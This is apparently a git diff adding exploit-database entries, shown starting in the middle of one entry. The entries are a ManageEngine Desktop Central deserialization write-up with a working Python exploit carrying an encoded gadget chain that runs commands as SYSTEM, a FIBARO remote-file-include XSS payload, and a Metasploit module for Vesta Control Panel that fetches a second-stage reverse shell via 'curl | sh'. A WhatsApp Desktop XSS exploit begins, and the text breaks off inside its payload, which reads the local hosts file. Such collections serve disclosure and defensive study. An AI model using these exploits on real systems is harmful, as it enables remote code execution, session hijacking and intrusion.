+    protected void doGet(HttpServletRequest request, HttpServletResponse response)
+            throws ServletException, IOException {
+        if (debugged) {
+            logRequest(request);
+        }
+        addHeaders(response);
+        if ((request.getParameter("state") != null) || (!request.getParameterNames().hasMoreElements())) {
+            requestState(response);
+            return;
+        }
+        int width = 400;
+        int height = 400;
+        boolean removeAfterRendering = false;
+        if (request.getParameter("removeAfterRendering") != null) {
+            removeAfterRendering = true;
+        }
+        if (request.getParameter("width") != null) {
+            width = Integer.parseInt(request.getParameter("width"));
+        }
+        if (request.getParameter("height") != null) {
+            height = Integer.parseInt(request.getParameter("height"));
+        }
+        if (!renderingEnabled) {
+            renderNotEnabled(response, 400, 50);
+            return;
+        }
+        if ((width > config.getMaxImageWidth()) || (height > config.getMaxImageHeight())) {
+            renderImageTooLarge(response, 400, 50);
+            return;
+        }
+        String imgKey = request.getParameter("img");                                // 1
+        if (imgKey == null) {
+            logAndRenderException(new ServletException("no 'img' parameter provided for Cewolf servlet."), response,
+                    width, height);
+            return;
+        }
+        Storage storage = config.getStorage();
+        ChartImage chartImage = storage.getChartImage(imgKey, request);             // 2
+```
+
+At [1] the code sets the `imgKey` variable using the GET parameter `img`. Later at [2], the code then calls the `storage.getChartImage` method with the attacker supplied `img`. You maybe wondering what class the `storage` instance is. This was mapped as an initializing parameter to the servlet code in the web.xml file:
+
+```
+    <init-param>
+        <param-name>storage</param-name>
+        <param-value>de.laures.cewolf.storage.FileStorage</param-value>
+    </init-param>
+```
+
+```
+public class FileStorage implements Storage {
+    static final long serialVersionUID = -6342203760851077577L;
+    String basePath = null;
+    List stored = new ArrayList();
+    private boolean deleteOnExit = false;
+
+    //...
+
+    public void init(ServletContext servletContext) throws CewolfException {
+        basePath = servletContext.getRealPath("/");
+        Configuration config = Configuration.getInstance(servletContext);
+        deleteOnExit = "true".equalsIgnoreCase("" + (String) config.getParameters().get("FileStorage.deleteOnExit"));
+        servletContext.log("FileStorage initialized, deleteOnExit=" + deleteOnExit);
+    }
+
+    //...
+
+    private String getFileName(String id) {
+        return basePath + "_chart" + id;                                            // 4
+    }
+
+    //...
+
+    public ChartImage getChartImage(String id, HttpServletRequest request) {
+        ChartImage res = null;
+        ObjectInputStream ois = null;
+        try {
+            ois = new ObjectInputStream(new FileInputStream(getFileName(id)));      // 3
+            res = (ChartImage) ois.readObject();                                    // 5
+            ois.close();
+        } catch (Exception ex) {
+            ex.printStackTrace();
+        } finally {
+            if (ois != null) {
+                try {
+                    ois.close();
+                } catch (IOException ioex) {
+                    ioex.printStackTrace();
+                }
+            }
+        }
+        return res;
+    }
+```
+
+At [3] the code calls `getFileName` using the attacker controlled `id` GET parameter which returns a path to a file on the filesystem using `basePath`. This field is set in the `init` method of the servlet. On the same line, the code creates a new `ObjectInputStream` instance from the supplied filepath via `FileInputStream`. This path is attacker controlled at [4], however, there is no need to (ab)use traversals here for exploitation.
+
+The most important point is that at [5] the code calls `readObject` using the contents of the file without any further lookahead validation.
+
+## Exploitation:
+
+For exploitation, an attacker can (ab)use the `MDMLogUploaderServlet` servlet to plant a file on the filsystem with controlled content inside. Here is the corresponding web.xml entry:
+
+```
+<servlet>
+    <servlet-name>MDMLogUploaderServlet</servlet-name>
+    <servlet-class>com.me.mdm.onpremise.webclient.log.MDMLogUploaderServlet</servlet-class>
+</servlet>
+
+...
+
+<servlet-mapping>
+    <servlet-name>MDMLogUploaderServlet</servlet-name>
+    <url-pattern>/mdm/mdmLogUploader</url-pattern>
+    <url-pattern>/mdm/client/v1/mdmLogUploader</url-pattern>
+</servlet-mapping>
+```
+
+```
+public class MDMLogUploaderServlet extends DeviceAuthenticatedRequestServlet {
+    private Logger logger = Logger.getLogger("MDMLogger");
+    private Long customerID;
+    private String deviceName;
+    private String domainName;
+    private Long resourceID;
+    private Integer platformType;
+    private Long acceptedLogSize = Long.valueOf(314572800L);
+
+    public void doPost(HttpServletRequest request, HttpServletResponse response, DeviceRequest deviceRequest)
+            throws ServletException, IOException {
+        Reader reader = null;
+        PrintWriter printWriter = null;
+
+        logger.log(Level.WARNING, "Received Log from agent");
+
+        Long nDataLength = Long.valueOf(request.getContentLength());
+
+        logger.log(Level.WARNING, "MDMLogUploaderServlet : file conentent lenght is {0}", nDataLength);
+
+        logger.log(Level.WARNING, "MDMLogUploaderServlet :Acceptable file conentent lenght is {0}", acceptedLogSize);
+        try {
+            if (nDataLength.longValue() <= acceptedLogSize.longValue()) {
+                String udid = request.getParameter("udid");                                                                     // 1
+                String platform = request.getParameter("platform");
+                String fileName = request.getParameter("filename");                                                             // 2
+                HashMap deviceMap = MDMUtil.getInstance().getDeviceDetailsFromUDID(udid);
+                if (deviceMap != null) {
+                    customerID = ((Long) deviceMap.get("CUSTOMER_ID"));
+                    deviceName = ((String) deviceMap.get("MANAGEDDEVICEEXTN.NAME"));
+                    domainName = ((String) deviceMap.get("DOMAIN_NETBIOS_NAME"));
+                    resourceID = ((Long) deviceMap.get("RESOURCE_ID"));
+                    platformType = ((Integer) deviceMap.get("PLATFORM_TYPE"));
+                } else {
+                    customerID = Long.valueOf(0L);
+                    deviceName = "default";
+                    domainName = "default";
+                }
+                String baseDir = System.getProperty("server.home");
+
+                deviceName = removeInvalidCharactersInFileName(deviceName);
+
+                String localDirToStore = baseDir + File.separator + "mdm-logs" + File.separator + customerID
+                        + File.separator + deviceName + "_" + udid;                                                             // 3
+
+                File file = new File(localDirToStore);
+                if (!file.exists()) {
+                    file.mkdirs();                                                                                              // 4
+                }
+                logger.log(Level.WARNING, "absolute Dir {0} ", new Object[]{localDirToStore});
+
+                fileName = fileName.toLowerCase();
+                if ((fileName != null) && (FileUploadUtil.hasVulnerabilityInFileName(fileName, "log|txt|zip|7z"))) {            // 5
+                    logger.log(Level.WARNING, "MDMLogUploaderServlet : Going to reject the file upload {0}", fileName);
+                    response.sendError(403, "Request Refused");
+                    return;
+                }
+                String absoluteFileName = localDirToStore + File.separator + fileName;                                          // 6
+
+                logger.log(Level.WARNING, "absolute File Name {0} ", new Object[]{fileName});
+
+                InputStream in = null;
+                FileOutputStream fout = null;
+                try {
+                    in = request.getInputStream();                                                                              // 7
+                    fout = new FileOutputStream(absoluteFileName);                                                              // 8
+
+                    byte[] bytes = new byte['✐'];
+                    int i;
+                    while ((i = in.read(bytes)) != -1) {
+                        fout.write(bytes, 0, i);                                                                                // 9
+                    }
+                    fout.flush();
+                } catch (Exception e1) {
+                    e1.printStackTrace();
+                } finally {
+                    if (fout != null) {
+                        fout.close();
+                    }
+                    if (in != null) {
+                        in.close();
+                    }
+                }
+                SupportFileCreation supportFileCreation = SupportFileCreation.getInstance();
+                supportFileCreation.incrementMDMLogUploadCount();
+                JSONObject deviceDetails = new JSONObject();
+                deviceDetails.put("platformType", platformType);
+                deviceDetails.put("dataId", resourceID);
+                deviceDetails.put("dataValue", deviceName);
+                supportFileCreation.removeDeviceFromList(deviceDetails);
+            } else {
+                logger.log(Level.WARNING,
+                        "MDMLogUploaderServlet : Going to reject the file upload as the file conentent lenght is {0}",
+                        nDataLength);
+                response.sendError(403, "Request Refused");
+                return;
+            }
+            return;
+        } catch (Exception e) {
+            logger.log(Level.WARNING, "Exception   ", e);
+        } finally {
+            if (reader != null) {
+                try {
+                    reader.close();
+                } catch (Exception ex) {
+                    ex.fillInStackTrace();
+                }
+            }
+        }
+    }
+```
+
+```
+    private static boolean isContainDirectoryTraversal(String fileName) {
+        if ((fileName.contains("/")) || (fileName.contains("\\"))) {
+            return true;
+        }
+        return false;
+    }
+
+    //...
+
+    public static boolean hasVulnerabilityInFileName(String fileName, String allowedFileExt) {
+        if ((isContainDirectoryTraversal(fileName)) || (isCompletePath(fileName))
+                || (!isValidFileExtension(fileName, allowedFileExt))) {
+            return true;
+        }
+        return false;
+    }
+```
+
+We can see that at [1] the `udid` variable is controlled using the `udid` GET parameter from a POST request. At [2] the `fileName` variable is controlled from the GET parameter `filename`. This `filename` GET parameter is actually filtered in 2 different ways for malicious values. At [3] a path is contructed using the GET parameter from [1] and at [4] a `mkdirs` primitive is hit. This is important because the _charts directory doesn't exist on the filesystem which is needed in order to exploit the deserialization bug. There is some validation on the `filename` at [5] which calls `FileUploadUtil.hasVulnerabilityInFileName` to check for directory traversals and an allow list of extensions.
+
+Of course, this doesn't stop `udid` from containing directory traversals, but I digress. At [6] the `absoluteFileName` variable is built up from the attacker influenced path at [3] using the filename from [2] and at [7] the binary input stream is read from the attacker controlled POST body. Finally at [8] and [9] the file is opened and the contents of the request is written to disk. What is not apparent however, is that further validation is performed on the `filename` at [2]. Let's take one more look at the web.xml file:
+
+```
+<init-param>
+    <param-name>config-file</param-name>
+    <param-value>security-regex.xml,security-mdm-regex.xml,security-mdm-api-regex.xml,security-properties.xml,security-common.xml,security-admin-sec-settings.xml,security-fws.xml,security-api.xml,security-patch-restapi.xml,security-mdm-groupdevices.xml,security-mdm-admin.xml,security-mdm-general.xml,security-mdm-agent.xml,security-mdm-reports.xml,security-mdm-inventory.xml,security-mdm-appmgmt.xml,security-mdm-docmgmt.xml,security-mdm-configuration.xml,security-defaultresponseheaders.xml,security-mdm-remote.xml,security-mdm-api-json.xml,security-mdm-api-get.xml,security-mdm-api-post.xml,security-mdm-api-put.xml,security-mdm-api-delete.xml,security-mdm-privacy.xml,security-mdm-osmgmt.xml,security-mdmapi-appmgmt.xml,security-mdmapi-profilejson.xml,security-mdmapi-profilemgmt.xml,security-mdm-compliance.xml,security-mdm-geofence.xml,security-mdmapi-sdp.xml,security-mdmp-CEA.xml,security-mdmapi-supporttab.xml,security-mdmapi-general.xml,security-mdm-roles.xml,security-mdm-technicians.xml,security-mdm-cea.xml,security-mdmapi-content-mgmt.xml,security-config.xml,security-patch.xml,security-patch-apd-scan.xml,security-patch-apd-scan-views.xml,security-patch-deployment.xml,security-patch-views.xml,security-patch-config.xml,security-patch-onpremise.xml,security-patch-server.xml,security-onpremise-common.xml,security-mdm-onpremise-files.xml,security-mdmapi-directory.xml,security-admin.xml,security-onpremise-admin.xml,security-reports.xml,security-inventory.xml,security-custom-fields.xml</param-value>
+</init-param>
+```
+
+The file that stands out is the `security-mdm-agent.xml` config file. The corrosponding entry for the `MDMLogUploaderServlet` servlet looks like this:
+
+```
+        <url path="/mdm/mdmLogUploader" apiscope="MDMCloudEnrollment"  authentication="required" duration="60" threshold="10" lock-period="60" method="post" csrf="false">
+            <param name="platform" regex="ios|android"/>
+            <param name="filename" regex="logger.txt|logger.zip|mdmlogs.zip|managedprofile_mdmlogs.zip"/>
+            <param name="uuid" regex="safestring"/>
+            <param name="udid" regex="udid"/>
+            <param name="erid" type="long"/>
+                        <param name="authtoken" regex="apikey" secret="true"/>
+                        <param name="SCOPE" regex="scope" />
+                        <param name="encapiKey" regex="encapiKey" max-len="200" />
+            <param name="initiatedBy" regex="safestring"/>
+            <param name="extraData" type="JSONObject" template="supportIssueDetailsJson" max-len="2500"/>
+        </url>
+```
+
+Note that the authentication attribute is ignored in this case. The `filename` GET parameter is restricted to the following strings: "logger.txt", "logger.zip", "mdmlogs.zip" and "managedprofile_mdmlogs.zip" using a regex pattern. For exploitation, this limitation doesn't matter since the deserialization bug permits a completely controlled filename.
+
+## Example:
+
+saturn:~ mr_me$ ./poc.py 
+(+) usage: ./poc.py <target> <cmd>
+(+) eg: ./poc.py 172.16.175.153 mspaint.exe
+
+saturn:~ mr_me$ ./poc.py 172.16.175.153 "cmd /c whoami > ../webapps/DesktopCentral/si.txt"
+(+) planted our serialized payload
+(+) executed: cmd /c whoami > ../webapps/DesktopCentral/si.txt
+
+saturn:~ mr_me$ curl http://172.16.175.153:8020/si.txt
+nt authority\system
+"""
+import os
+import sys
+import struct
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+def _get_payload(c):
+    p  = "aced0005737200176a6176612e7574696c2e5072696f72697479517565756594"
+    p += "da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400"
+    p += "164c6a6176612f7574696c2f436f6d70617261746f723b787000000002737200"
+    p += "2b6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265"
+    p += "616e436f6d70617261746f72cf8e0182fe4ef17e0200024c000a636f6d706172"
+    p += "61746f7271007e00014c000870726f70657274797400124c6a6176612f6c616e"
+    p += "672f537472696e673b78707372003f6f72672e6170616368652e636f6d6d6f6e"
+    p += "732e636f6c6c656374696f6e732e636f6d70617261746f72732e436f6d706172"
+    p += "61626c65436f6d70617261746f72fbf49925b86eb13702000078707400106f75"
+    p += "7470757450726f706572746965737704000000037372003a636f6d2e73756e2e"
+    p += "6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e"
+    p += "747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d"
+    p += "5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b00"
+    p += "0a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a"
+    p += "6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f"
+    p += "6f757470757450726f706572746965737400164c6a6176612f7574696c2f5072"
+    p += "6f706572746965733b787000000000ffffffff757200035b5b424bfd19156767"
+    p += "db37020000787000000002757200025b42acf317f8060854e002000078700000"
+    p += "069bcafebabe0000003200390a00030022070037070025070026010010736572"
+    p += "69616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c75"
+    p += "6505ad2093f391ddef3e0100063c696e69743e010003282956010004436f6465"
+    p += "01000f4c696e654e756d6265725461626c650100124c6f63616c566172696162"
+    p += "6c655461626c6501000474686973010013537475625472616e736c6574506179"
+    p += "6c6f616401000c496e6e6572436c61737365730100354c79736f73657269616c"
+    p += "2f7061796c6f6164732f7574696c2f4761646765747324537475625472616e73"
+    p += "6c65745061796c6f61643b0100097472616e73666f726d010072284c636f6d2f"
+    p += "73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f7873"
+    p += "6c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c"
+    p += "2f696e7465726e616c2f73657269616c697a65722f53657269616c697a617469"
+    p += "6f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73"
+    p += "756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c"
+    p += "74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f"
+    p += "72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65"
+    p += "722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074"
+    p += "696f6e730700270100a6284c636f6d2f73756e2f6f72672f6170616368652f78"
+    p += "616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e"
+    p += "2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d"
+    p += "417869734974657261746f723b4c636f6d2f73756e2f6f72672f617061636865"
+    p += "2f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c69"
+    p += "7a6174696f6e48616e646c65723b29560100086974657261746f720100354c63"
+    p += "6f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64"
+    p += "746d2f44544d417869734974657261746f723b01000768616e646c6572010041"
+    p += "4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c"
+    p += "2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c6572"
+    p += "3b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a"
+    p += "000b07002801003379736f73657269616c2f7061796c6f6164732f7574696c2f"
+    p += "4761646765747324537475625472616e736c65745061796c6f6164010040636f"
+    p += "6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f"
+    p += "78736c74632f72756e74696d652f41627374726163745472616e736c65740100"
+    p += "146a6176612f696f2f53657269616c697a61626c65010039636f6d2f73756e2f"
+    p += "6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f"
+    p += "5472616e736c6574457863657074696f6e01001f79736f73657269616c2f7061"
+    p += "796c6f6164732f7574696c2f476164676574730100083c636c696e69743e0100"
+    p += "116a6176612f6c616e672f52756e74696d6507002a01000a67657452756e7469"
+    p += "6d6501001528294c6a6176612f6c616e672f52756e74696d653b0c002c002d0a"
+    p += "002b002e01000708003001000465786563010027284c6a6176612f6c616e672f"
+    p += "537472696e673b294c6a6176612f6c616e672f50726f636573733b0c00320033"
+    p += "0a002b003401000d537461636b4d61705461626c6501001d79736f7365726961"
+    p += "6c2f50776e6572373633323838353835323036303901001f4c79736f73657269"
+    p += "616c2f50776e657237363332383835383532303630393b002100020003000100"
+    p += "040001001a000500060001000700000002000800040001000a000b0001000c00"
+    p += "00002f00010001000000052ab70001b100000002000d0000000600010000002e"
+    p += "000e0000000c000100000005000f003800000001001300140002000c0000003f"
+    p += "0000000300000001b100000002000d00000006000100000033000e0000002000"
+    p += "0300000001000f00380000000000010015001600010000000100170018000200"
+    p += "19000000040001001a00010013001b0002000c000000490000000400000001b1"
+    p += "00000002000d00000006000100000037000e0000002a000400000001000f0038"
+    p += "00000000000100150016000100000001001c001d000200000001001e001f0003"
+    p += "0019000000040001001a00080029000b0001000c00000024000300020000000f"
+    p += "a70003014cb8002f1231b6003557b10000000100360000000300010300020020"
+    p += "00000002002100110000000a000100020023001000097571007e0010000001d4"
+    p += "cafebabe00000032001b0a000300150700170700180700190100107365726961"
+    p += "6c56657273696f6e5549440100014a01000d436f6e7374616e7456616c756505"
+    p += "71e669ee3c6d47180100063c696e69743e010003282956010004436f64650100"
+    p += "0f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c65"
+    p += "5461626c6501000474686973010003466f6f01000c496e6e6572436c61737365"
+    p += "730100254c79736f73657269616c2f7061796c6f6164732f7574696c2f476164"
+    p += "6765747324466f6f3b01000a536f7572636546696c6501000c47616467657473"
+    p += "2e6a6176610c000a000b07001a01002379736f73657269616c2f7061796c6f61"
+    p += "64732f7574696c2f4761646765747324466f6f0100106a6176612f6c616e672f"
+    p += "4f626a6563740100146a6176612f696f2f53657269616c697a61626c6501001f"
+    p += "79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747300"
+    p += "2100020003000100040001001a00050006000100070000000200080001000100"
+    p += "0a000b0001000c0000002f00010001000000052ab70001b100000002000d0000"
+    p += "000600010000003b000e0000000c000100000005000f00120000000200130000"
+    p += "0002001400110000000a000100020016001000097074000450776e7270770100"
+    p += "7871007e000d78"
+    obj = bytearray(bytes.fromhex(p))
+    obj[0x240:0x242] = struct.pack(">H", len(c) + 0x694)
+    obj[0x6e5:0x6e7] = struct.pack(">H", len(c))
+    start = obj[:0x6e7]
+    end = obj[0x6e7:]
+    return start + str.encode(c) + end
+
+def we_can_plant_serialized(t, c):
+    # stage 1 - traversal file write primitive
+    uri = "https://%s:8383/mdm/client/v1/mdmLogUploader" % t
+    p = {
+        "udid" : "si\\..\\..\\..\\webapps\\DesktopCentral\\_chart",
+        "filename" : "logger.zip"
+    }
+    h = { "Content-Type" : "application/octet-stream" }
+    d = _get_payload(c)
+    r = requests.post(uri, params=p, data=d, verify=False)
+    if r.status_code == 200:
+        return True
+    return False
+
+def we_can_execute_cmd(t):
+    # stage 2 - deserialization
+    uri = "https://%s:8383/cewolf/" % t
+    p = { "img" : "\\logger.zip" }
+    r = requests.get(uri, params=p, verify=False)
+    if r.status_code == 200:
+        return True
+    return False
+
+def main():
+    if len(sys.argv) != 3:
+        print("(+) usage: %s <target> <cmd>" % sys.argv[0])
+        print("(+) eg: %s 172.16.175.153 mspaint.exe" % sys.argv[0])
+        sys.exit(1)
+    t = sys.argv[1]
+    c = sys.argv[2]
+    if we_can_plant_serialized(t, c):
+        print("(+) planted our serialized payload")
+        if we_can_execute_cmd(t):
+            print("(+) executed: %s" % c)
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48240.txt b/exploits/multiple/webapps/48240.txt
new file mode 100644
index 000000000..80ad639d9
--- /dev/null
+++ b/exploits/multiple/webapps/48240.txt
@@ -0,0 +1,56 @@
+# Exploit Title: FIBARO System Home Center 5.021 - Remote File Include
+# Date: 2020-03-22
+# Author: LiquidWorm
+# Vendor: https://www.fibaro.com
+# CVE: N/A
+
+Vendor: FIBAR GROUP S.A.
+Product web page: https://www.fibaro.com
+Affected version: Home Center 3, Home Center 2, Home Center Lite
+                  5.021.38
+                  4.580
+                  4.570
+                  4.540
+                  4.530
+                  4.510
+                  4.180
+
+
+Summary: Imagine that you live in a house where everything happens by itself.
+FIBARO Smart Home takes care of your everyday comfort and safety of all family
+members and in the meantime, saves energy on every single occasion. All this is
+possible thanks to Home Center 2 smart home HUB. Home Center 2 is an indispensable
+part of the FIBARO System without which the rest devices of home automation would
+be only beautiful objects. The smart home HUB collects and analyzes information
+about devices, communicates them with each other and thus directs the operation
+of the entire system and takes care of its security.
+
+Desc: The smart home solution is vulnerable to a remote Cross-Site Scripting
+triggered via a Remote File Inclusion issue by including arbitrary client-side
+dynamic scripts (JavaScript, VBScript) due to the undocumented proxy API and its
+url GET parameter. This allows hijacking the current session of the user or
+changing the look of the page by changing the HTML.
+
+Tested on: Apache/2.2.16 (Debian)
+           nginx/1.9.5
+           nginx/1.8.0
+           lighttpd/1.4.41
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2020-5563
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5563.php
+
+
+04.02.2020
+
+--
+
+
+http://10.0.0.2:8880/api/proxy?url=https://www.zeroscience.mk/pentest/XSS.svg
+
+$ cat /pentest/XSS.svg
+<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48294.rb b/exploits/multiple/webapps/48294.rb
new file mode 100755
index 000000000..53c997d1a
--- /dev/null
+++ b/exploits/multiple/webapps/48294.rb
@@ -0,0 +1,239 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Ftp
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Vesta Control Panel Authenticated Remote Code Execution",
+      'Description'    => %q{
+        This module exploits command injection vulnerability in v-list-user-backups bash script file.
+        Low privileged authenticated users can execute arbitrary commands under the context of the root user.
+
+        An authenticated attacker with a low privileges can inject a payload in the file name starts with dot.
+        During the user backup process, this file name will be evaluated by the v-user-backup bash scripts. As
+        result of that backup process, when an attacker try to list existing backups injected payload will be
+        executed.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis/'],
+          ['CVE', '2020-10808']
+        ],
+      'DefaultOptions'  =>
+        {
+          'SSL' => true,
+          'RPORT' => 8083,
+          'WfsDelay' => 300,
+          'Payload' => 'python/meterpreter/reverse_tcp'
+        },
+      'Platform'       => ['python'],
+      'Arch'           => ARCH_PYTHON,
+      'Targets'        => [[ 'Automatic', { }]],
+      'Privileged'     => false,
+      'DisclosureDate' => "Mar 17 2020",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(8083),
+        OptString.new('USERNAME', [true, 'The username to login as']),
+        OptString.new('PASSWORD', [true, 'The password to login with']),
+        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
+      ]
+    )
+    deregister_options('FTPUSER', 'FTPPASS')
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def login
+    #
+    # This is very simple login process. Nothing important.
+    # We will be using cookie and csrf_token across the module so that we are global variable.
+    #
+    print_status('Retrieving cookie and csrf token values')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login', '/'),
+    })
+
+    if res && res.code == 200 && !res.get_cookies.empty?
+      @cookie = res.get_cookies
+      @csrf_token = res.body.scan(/<input type="hidden" name="token" value="(.*)">/).flatten[0] || ''
+      if @csrf_token.empty?
+        fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.')
+      end
+    else
+      fail_with(Failure::Unknown, 'Something went wrong.')
+    end
+    print_good('Cookie and CSRF token values successfully retrieved')
+
+    print_status('Authenticating to HTTP Service with given credentials')
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'login', '/'),
+      'cookie' => @cookie,
+      'vars_post' => {
+        'token'    => @csrf_token,
+        'user'     => username,
+        'password' => password
+      }
+    })
+
+    if res && res.code == 302 && !res.get_cookies.empty?
+      print_good('Successfully authenticated to the HTTP Service')
+      @cookie = res.get_cookies
+    else
+      fail_with(Failure::Unknown, 'Credentials are not valid.')
+    end
+  end
+
+  def is_scheduled_backup_running
+    res = trigger_scheduled_backup
+    #
+    # MORE explaination.
+    #
+    if res && res.code == 302
+      res = trigger_payload
+      if res.body.include?('An existing backup is already running. Please wait for that backup to finish.')
+        return true
+      else
+        print_good('It seems scheduled backup is done ..! Triggerring payload <3')
+        return false
+      end
+    else
+      fail_with(Failure::Unknown, 'Something went wrong. Did you get your session ?')
+    end
+    return false
+  end
+
+  def trigger_payload
+    res = send_request_cgi({
+      'method' => 'GET',
+      'cookie' => @cookie,
+      'uri' => normalize_uri(target_uri.path, 'list', 'backup', '/'),
+    })
+    if res && res.code == 200
+      res
+    else
+      fail_with(Failure::Unknown, 'Something went wrong. Maybe session timed out ?')
+    end
+  end
+
+  def trigger_scheduled_backup
+    res = send_request_cgi({
+      'method' => 'GET',
+      'cookie' => @cookie,
+      'uri' => normalize_uri(target_uri.path, 'schedule', 'backup', '/'),
+    })
+    if res && res.code == 302 && res.headers['Location'] =~ /\/list\/backup\//
+      res
+    else
+      fail_with(Failure::Unknown, 'Something went wrong.')
+    end
+  end
+
+  def payload_implant
+    #
+    # Our payload will be placed as a file name on FTP service.
+    # Payload lenght can't be more then 255 and SPACE can't be used because of the
+    # bug in the backend software. Due to these limitations, I used web delivery method.
+    #
+    # When the initial payload executed. It will execute very short perl command, which is going to fetch
+    # actual python meterpreter first stager and execute it.
+    #
+    final_payload = "curl -sSL #{@second_stage_url} | sh".to_s.unpack("H*").first
+    p = "perl${IFS}-e${IFS}'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'"
+
+    # Yet another datastore variable overriding.
+    if datastore['SSL']
+      ssl_restore = true
+      datastore['SSL'] = false
+    end
+    port_restore = datastore['RPORT']
+    datastore['RPORT'] = 21
+    datastore['FTPUSER'] = username
+    datastore['FTPPASS'] = password
+
+    #
+    # Connecting to the FTP service with same creds as web ui.
+    # Implanting the very first stage of payload as a empty file.
+    #
+    if (not connect_login)
+      fail_with(Failure::Unknown, 'Unable to authenticate to FTP service')
+    end
+    print_good('Successfully authenticated to the FTP service')
+
+    res = send_cmd_data(['PUT', ".a';$(#{p});'"], "")
+    if res.nil?
+      fail_with(Failure::UnexpectedReply, "Failed to upload the payload to FTP server")
+    end
+    print_good('Successfully uploaded the payload as a file name')
+    disconnect
+
+    # Revert datastore variables.
+    datastore['RPORT'] = port_restore
+    datastore['SSL'] = true if ssl_restore
+  end
+
+  def exploit
+    start_http_server
+    payload_implant
+    login
+    trigger_scheduled_backup
+    print_good('Scheduled backup has ben started. Exploitation may take up to 5 minutes.')
+    while is_scheduled_backup_running == true
+      print_status('It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...')
+      Rex.sleep(30)
+    end
+    stop_service
+  end
+
+  def on_request_uri(cli, request)
+    print_good('First stage is executed ! Sending 2nd stage of the payload')
+    second_stage = "python -c \"#{payload.encoded}\""
+    send_response(cli, second_stage, {'Content-Type'=>'text/html'})
+  end
+
+  def start_http_server
+    #
+    # HttpClient and HttpServer use same SSL variable :(
+    # We don't need a SSL for payload delivery.
+    #
+    if datastore['SSL']
+      ssl_restore = true
+      datastore['SSL'] = false
+    end
+    start_service({'Uri' => {
+        'Proc' => Proc.new { |cli, req|
+          on_request_uri(cli, req)
+        },
+        'Path' => resource_uri
+    }})
+    print_status("Second payload download URI is #{get_uri}")
+    # We need that global variable since get_uri keep using SSL from datastore
+    # We have to get the URI before restoring the SSL.
+    @second_stage_url = get_uri
+    datastore['SSL'] = true if ssl_restore
+  end
+end
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48295.txt b/exploits/multiple/webapps/48295.txt
new file mode 100644
index 000000000..7e0e139ae
--- /dev/null
+++ b/exploits/multiple/webapps/48295.txt
@@ -0,0 +1,42 @@
+# Title: WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting
+# Date: 2020-01-21
+# Exploit Author: Gal Weizman
+# Vendor Homepage: https://www.whatsapp.com
+# Software Link: https://web.whatsapp.com/desktop/windows/release/x64/WhatsAppSetup.exe
+# Software Link: https://web.whatsapp.com/desktop/mac/files/WhatsApp.dmg
+# Version: 0.3.9308
+# Tested On: Mac OS, Windows, iPhone
+# CVE: https://nvd.nist.gov/vuln/detail/CVE-2019-18426
+
+// step 1: open WhatsApp Web and enter a conversation (Will only work on WhatsApp Web source code as compiled with version 0.3.9308)
+// step 2: open devtools and search in all files "t=e.id"
+// step 3: after prettifying, set a breakpoint at the line where "t = e.id" can be found
+// step 4: paste "https://example.com" in the text box and hit "Enter"
+// step 5: when the code stops at the breakpoint, paste the following exploit code in the console and hit "Enter"
+
+var payload = `(async function() {
+    alert(navigator.userAgent);
+    (async function() {
+	    // read "file:///C:/windows/system32/drivers/etc/hosts" content
